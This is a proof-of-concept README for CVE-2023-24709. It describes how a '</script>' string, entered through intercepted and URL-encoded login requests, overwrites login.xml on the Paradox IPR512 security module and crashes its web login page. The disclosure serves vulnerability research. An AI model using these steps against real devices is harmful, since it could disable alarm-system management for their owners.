CVE-2023-24709 PoC — Paradox Security Systems IPR512 代码注入漏洞

Description

In Paradox Security System IPR512 Web console login form page, attacker can input JavaScript string, such as "</script>" that will overwrite configurations in the file "login.xml" and cause the login page to crash. 

Readme

# Injection vulnerability in Paradox Security Systems IPR512 - CVE-2023-24709 PoC
In Paradox Security System IPR512 Web console login form page, attacker can input JavaScript string, such as <code></script></code> that will overwrite configurations in the file "login.xml" and cause the login form to crash and make it unavailable. 

!!!WARNING!!! Be aware that it will make a damaging impact on the service functioning!

<b>1. The Paradox Security Systems IPR512 Account Management webpanel is accessible. Typing "admin" as a user.</b>
  
![screenshot](/img/pss_1.png)
  
<b>2. Intercepting request with BurpSuite.</b>
  
![screenshot](/img/pss_2.png)

<b>3. Changing "admin" with JavaScript tag <code></script></code></b>
  
![screenshot](/img/pss_3.png)

<b>4. URL encoding <code></script></code> to bypass security filter and sending request.</b>

![screenshot](/img/pss_4.png)

<b>5. If accessing the login.xml isn't restricted, you can check that it is overwritten.</b>
  
![screenshot](/img/pss_5.png)

<b>6. The webpanel login form isn't accessible anymore as it is crashed.</b>
  
![screenshot](/img/pss_6.png)

Code injection vulnerability in login.html in Web panel login page on IPR512 of the Paradox Security Systems product that allows a remote or local attacker to cause the web panel login page crash via injecting easy JavaScript code into login form page such as <code></script></code>. 

File Snapshot

Remarks